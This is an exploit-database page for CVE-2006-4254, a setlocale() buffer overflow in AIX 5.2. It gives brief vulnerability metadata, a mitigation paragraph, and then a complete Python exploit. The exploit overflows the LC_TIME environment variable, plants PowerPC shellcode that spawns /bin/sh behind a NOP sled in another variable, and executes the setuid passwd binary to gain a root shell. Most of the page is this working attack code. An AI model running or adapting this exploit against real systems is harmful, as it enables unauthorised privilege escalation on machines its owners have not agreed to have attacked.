setlocale() exploit for aix 5.2 (CVE-2006-4254)

vendor:

AIX

by:

thomas.pollet@gmail.com

7.5

CVSS

HIGH

setlocale() exploit

119

CWE

Product Name: AIX

Affected Version From: AIX 5.2

Affected Version To: AIX 5.2

Patch Exists: NO

Related CWE: CVE-2006-4254

CPE: o:ibm:aix:5.2

Metasploit:

Other Scripts:

Platforms Tested:

2006

setlocale() exploit for aix 5.2 (CVE-2006-4254)

This is an exploit for the setlocale() function in AIX 5.2. The exploit takes advantage of a buffer overflow vulnerability to execute arbitrary code. The exploit consists of a payload shellcode that will spawn a shell and execute a command. The exploit is triggered by calling the execve() function with specific arguments.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates for AIX 5.2. Additionally, ensure that input to the setlocale() function is properly validated and sanitized to prevent buffer overflow.

Source

Exploit-DB raw data:

#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254  )
#thomas.pollet@gmail.com
#
from os import execve

bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f"
egg="\x60"*2350
shellcode=(            # by intropy <at> caughq.org
"\x7c\xa5\x2a\x79"     # xor.    r5,r5,r5
"\x40\x82\xff\xfd"     # bnel    <shellcode>
"\x7f\xe8\x02\xa6"     # mflr    r31
"\x3b\xff\x01\x20"     # cal     r31,0x120(r31)
"\x38\x7f\xff\x08"     # cal     r3,-248(r31)
"\x38\x9f\xff\x10"     # cal     r4,-240(r31)
"\x90\x7f\xff\x10"     # st      r3,-240(r31)
"\x90\xbf\xff\x14"     # st      r5,-236(r31)
"\x88\x5f\xff\x0f"     # lbz     r2,-241(r31)
"\x98\xbf\xff\x0f"     # stb     r5,-241(r31)
"\x4c\xc6\x33\x42"     # crorc   cr6,cr6,cr6
"\x44\xff\xff\x02"     # svca
"/bin/sh"
"\x05")

execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})

# milw0rm.com [2007-11-07]